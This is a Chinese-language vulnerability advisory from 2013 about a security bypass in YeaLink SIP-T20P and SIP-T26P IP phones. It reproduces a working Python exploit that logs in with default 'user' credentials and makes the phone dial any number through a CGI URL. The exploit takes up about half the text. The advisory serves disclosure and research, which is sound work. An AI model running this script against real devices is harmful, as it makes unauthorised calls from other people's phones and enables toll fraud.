YeaLink IP Phone SIP-T20P/SIP-T26P安全绕过漏洞
发布日期:2013-05-29
更新日期:2013-05-30
受影响系统:yealink Yealink SIP-T20P IP Phone
yealink SIP-T26P
描述:
BUGTRAQ ID:
60204
YeaLink IP Phone SIP-T20P、SIP-T26P是企业级HD IP电话。
YeaLink IP Phone SIP-T20P、SIP-T26P在实现上存在安全绕过漏洞,攻击者可利用此漏洞绕过某些安全限制并执行未授权操作。
<*来源:b0hr
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
import urllib2, sys
print "\n YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 phone call vulnerability - b0rh (francisco<[at]>garnelo.eu) - 2013-05-28 \n"
if (len(sys.argv) != 3):
print ">> Use: " + sys.argv[0] + " <IP Phone> <phone number>"
print ">> Ex: " + sys.argv[0] + " 127.0.0.1 123456789\n"
exit(0)
IP = sys.argv[1]
num = sys.argv[2]
UrlGet_params = 'http://%s/cgi-bin/ConfigManApp.com?Id=34&Command=1&Number=%s&Account=0&sid=0.724202975169738' % (IP, num)
webU = 'user'
webP = 'user'
query = urllib2.HTTPPasswordMgrWithDefaultRealm()
query.add_password(None, UrlGet_params, webU, webP)
auth = urllib2.HTTPBasicAuthHandler(query)
log = urllib2.build_opener(auth)
urllib2.install_opener(log)
queryPag = urllib2.urlopen(UrlGet_params)
print "\n Call to %s form IP phone %s\n" %(num,IP)
建议:
厂商补丁:
yealink
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://yealink.com浏览次数:4366
严重程度:0(网友投票)
